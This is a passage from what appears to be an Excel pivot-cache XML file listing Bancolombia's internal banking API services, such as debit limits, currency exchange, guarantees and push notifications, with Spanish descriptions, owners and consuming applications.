    <s v="Este servicio permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el día.   Para esto, el servicio permitirá consultar el monto límite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el día para poder determinar hasta que momento puede debitarse de sus cuentas."/>
    <s v="CANALES_DIGITALES"/>
    <s v="SOA y APIs"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="DEVELOPSOATEST _x000d__x000a_DEVELOPSOATESTMQ _x000d__x000a_AW0955001 _x000d__x000a_AW1277001 _x000d__x000a_NU0151001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Debito Automatico"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite a los diferentes canales de Bancolombia realizar la inscripción, consulta, modificación y eliminación del débito automático de una cuenta de ahorros, corriente o tarjeta de crédito."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="SCI _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_APP _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Desembolso Credito Pyme"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestion Desembolso Credito Pyme, permite gestionar el proceso de desembolso que se encuentra orquestado por Bizagi, permitiendo la creación del desembolso, aceptación de una oferta y por ultimo aceptación del desembolso como tal."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="AW1170 _x000d__x000a_AW1287 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Divisas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Divisas tiene como objetivo realizar funcionalidades propias con las divisas como compra y venta de divisas o reversión de una compra o venta de divisas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Divisas"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio Gestión Divisas tiene como objetivo realizar funcionalidades propias con las divisas como compra y venta de divisas o reversión de una compra o venta de divisas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Exoneraciones Tarjeta Debito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="La necesidad de la creación surge de con la iniciativa de tener gestión sobre el concepto de exoneraciones. El servicio permite consultar, eliminar o grabar una exoneración en la tarjeta del cliente, operaciones aplicadas a las tarjetas débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Externa Documental"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio presenta a los clientes consumidores un esquema de seguridad para acceder a los servicios de negocio del Banco asociados a Gestión Documental. Garantiza el firmado y cifrado de la información enviada e implementa mecanismos de filtrado a nivel de comunicaciones para autorizar a los proveedores integrales de servicio que lo consumen."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="8"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW1177 _x000d__x000a_AW1313001 _x000d__x000a_AW0638 _x000d__x000a_AW1128 _x000d__x000a_DataFile _x000d__x000a_Carvajal _x000d__x000a_AW1011 _x000d__x000a_AW1203001 _x000d__x000a_ISFID0023"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Facturas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Transacción encargada de realizar la inscripción de facturas , se valida si el usuario posee algún tipo de Conevnio para su activación directa, en caso de que el convenio maneje Delay se hara unas prevalidaciones de seguridad y quedara en estado pendiente, las facturas que quedaran activas las manejara Finacle. En la transacción se recibe el código del convenio, el documento, y datos necesarios para su ejecución."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Fondos Fiduciarios"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio tiene como objetivo ejecutar operaciones transaccionales de los fondos de inversión colectiva administrado por la fiduciaria tales como Adiciones, cancelaciones, retiros y constituciones para el producto de InvesBot."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Fraude Crediticio"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio GestionFraudeCrediticio es un apoyo a los procesos de validaciones de solicitudes crediticias, en el cual los consumidores podrán validar posibles indicios de fraude por parte del solicitante   de un producto en el proceso de originación u obtener alertas si el solicitante ya cometió un fraude en otra entidad financiera."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Garantias Banco FNG"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite la radicación del tipo de garantía Fondo Nacional de Garantías el cual previamente se tuvo que haber registrado en el FNG. Para posteriormente realizar su matricula en el Iseries del banco."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Garantias Fondo Nacional"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Fondo Nacional Garantías permite reservar y registrar una garantía en el Fondo Nacional. Para posteriormente asociarla a una obligación"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1285001 _x000d__x000a_AW0856 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Giro Multicanal"/>
    <n v="100"/>
    <x v="0"/>
    <s v="GestionGiroMulticanal ofrece a sus consumidores la posibilidad de operar todo lo relacionado con los giros en los distintos canales ofrecidos por el banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <s v="Monica Cecilia Gallego Rengifo"/>
    <m/>
    <s v="GIR-Giros Nacionales Multicanal_ISGIR001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion GMF"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El Servicio GestionGMF habilita las capacidades que permite agregar o eliminar el beneficio de Gravamen a los Movimientos Financieros (GMF) de cuentas de ahorro, corriente o de depósitos para un cliente en particular."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Interna Documental"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio presenta a los clientes consumidores un esquema de seguridad para acceder a los servicios de negocio del Banco asociados a Gestión Documental. Garantiza el firmado y cifrado de la información enviada e implementa mecanismos de filtrado a nivel de comunicaciones para autorizar a los proveedores integrales de servicio que lo consumen."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="8"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW1177 _x000d__x000a_NU0034001 _x000d__x000a_AW1176 _x000d__x000a_AW0856 _x000d__x000a_AW0638 _x000d__x000a_AW1258002 _x000d__x000a_AW1133 _x000d__x000a_AW0659 _x000d__x000a_AW1315001 _x000d__x000a_AW1203001 _x000d__x000a_NU0015"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Inversiones"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que permite al cliente realizar la Activación, desactivación y Cancelación de una inversión virtual, en cualquier momento siempre y cuando la inversión virtual no se encuentre en periodo de gracia. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <m/>
    <s v="CDT _x000d__x000a_NU0014001 _x000d__x000a_SVE _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0153001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Leasing Financiero"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Leasing Financiero permitirá la creación de condiciones de Leasing financiero por activo de negocio.  Las condiciones de un leasing financiero incluyen la información del solicitante, el activo, montos, tasas, seguros, opción de compra, proveedor del activo, avalistas de la operación, entre otros."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <s v="_x000a__x000a_LEASING_AW1171001"/>
    <s v="AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Limite"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite realizar la administración de los límites máximos de endeudamiento para una persona natural."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW0937 _x000d__x000a_AW0856 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Limite"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio GestionLimite permite realizar la administración de los límites máximos de endeudamiento para una persona natural. Inicialmente, contará con la operación crearLimite pero el objetivo es que a futuro se agreguen nuevas operaciones que permitan consultar y eliminar un límite. Este servicio adoptará a nivel de desarrollo la nueva funcionalidad creada en bróker (ConsumerMediatorSTI) para habilitar rápidamente consumos sin necesidad de hacer un desarrollo completo."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW1170 _x000d__x000a_AW1287 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Limites De Endeudamiento"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Versión Inicial del Servicio Gestión Limites de Endeudamiento de la EVC Ciclo de Crédito, que cuenta con la capacidad de fijar el limite global de Endeudamiento para un cliente, así como crear el sublímite de endeudamiento para una línea de crédito especifica."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_APICONNECT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Listas De Control"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Este servicio tiene la capacidad de ingresar a un cliente en una categoría y subcategoría de listas de control. El cliente puede ser persona Natural o Jurídica. Este servicio no contempla el retiro de clientes de estas listas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="AW1177 _x000d__x000a_NU0034001 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Listas De Control"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permitirá ingresar un usuario a una lista de control, eliminarlo de una lista o realizar estas mismas operaciones de forma masiva a través de la carga de un archivo. "/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="AW1177 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Llave Cifrado"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite a los consumidores obtener la llave de cifrado con la cual se encriptan las credenciales de acceso (clave) de los clientes a los diferentes canales del banco."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="AW0955 _x000d__x000a_NU0051001 _x000d__x000a_AW0955001 _x000d__x000a_AW1185001 _x000d__x000a_AW1291001 _x000d__x000a_AW1170 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Notificaciones Push"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permitirá la implementación de las nuevas capacidades requeridas para las aplicaciones que usarán el segundo factor de autenticación Push._x000a__x000a_El servicio expone los métodos necesarios para generar notificaciones Push, enviados al dispositivo móvil registrado por un cliente, para aprobar o rechazar Información de la transacción."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="APIC _x000d__x000a_AW0856 _x000d__x000a_AW1071001 _x000d__x000a_NU0100001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Obligaciones Sufi"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Obligaciones de Sufi permitirá a los consumidores ejecutar todo tipo de operaciones relacionadas con la administración de las obligaciones del cliente desde su originación hasta su desembolso, este servicio se hace para el contexto y todos los procesos de negocio de sufi. Este servicio tiene como primer consumidor APM, siendo el motor de decisión de sufi. "/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="AW1097001 _x000d__x000a_ISSU20003 _x000d__x000a_AW1134001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Ordenes"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Ordenes permitirá consultar las ordenes que tiene disponible el cliente para realizar negociación de divisas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_NU0163001 _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Otp Pagos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite el reenvió de la OTP almacenada en el sistema de pagos al beneficiario, No se tendrá acceso al OTP y el servicio se encargara de enviar la notificación al backend para que este envié al numero de móvil que suministro el pagador al realizar la dispersión del archivo de pagos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1151001 _x000d__x000a_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Pago En Efectivo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este Producto API permite la gestión de pagos en efectivo por Corresponsal Bancario; a través de las operaciones construidas en esta API, se podrá ejecutar el pago a un beneficiario y se podrá realizar la anulación de una pago (Por errores como TimeOut o desconexión de la red)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1151001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Pago Leasing"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio encargado de acreditar los pagos para el proyecto de transformación digital"/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Pago Programado"/>
    <n v="110"/>
    <x v="0"/>
    <s v="Se ha creado version para agregar dos operaciones, crear y actualizar programación de pago"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion PQRS"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio GestionPQRS permitirá a los consumidores crear, modificar y consultar los casos de petición, quejas o reclamos en el sistema de almacenamiento de PQRS. "/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="NU0010001 _x000d__x000a_AW1218001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0150001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Precalculado Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite gestionar la base de datos de productos pre-calculado para los clientes, habilitando su consulta desde los diferentes canales y actualización de estado cuando el producto se haya entregado al cliente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="BD Grupo de Riesgos"/>
    <s v="AW1177 _x000d__x000a_AW0937 _x000d__x000a_ELIBOM _x000d__x000a_AW0856 _x000d__x000a_SVP _x000d__x000a_AW1128 _x000d__x000a_APP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Precalculado Cliente"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio permite gestionar la base de datos de productos pre-calculado para los clientes, habilitando su consulta desde los diferentes canales y actualización de estado cuando el producto se haya entregado al cliente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="BD Grupo de Riesgos"/>
    <s v="APIC _x000d__x000a_AW0937 _x000d__x000a_AW1285001 _x000d__x000a_AW1299001 _x000d__x000a_AW1316001 _x000d__x000a_SVP _x000d__x000a_AW1177001 _x000d__x000a_AW1170 _x000d__x000a_AW1287 _x000d__x000a_AW1128 _x000d__x000a_APP _x000d__x000a_AW1313001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Puntos Colombia"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permitirá realizar la integración necesaria contra el tercero Puntos Colombia donde se encuentran los puntos consolidados (Bancolombia y Éxito) programa de fidelización de clientes del proyecto Lealtad. "/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="29"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Servicio-Puntos-Colombia_NU0016001"/>
    <s v="SVP _x000d__x000a_GDE _x000d__x000a_APP _x000d__x000a_AUD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Realce Tarjetas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="GestionRealceTarjetaCredito ofrece a sus consumidores la opción de enviar los datos para el realce de una Tarjeta de Crédito"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="Tarjetas Vision Plus_ISTVP001"/>
    <s v="TVP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Recaudo DIAN"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que permite el recaudo realizando la consulta y la notificación de los clientes con la DIAN en tiempo real."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Gobierno e Impuestos"/>
    <m/>
    <m/>
    <s v="DIAN"/>
    <s v="AW01065"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Rediferidos"/>
    <n v="100"/>
    <x v="0"/>
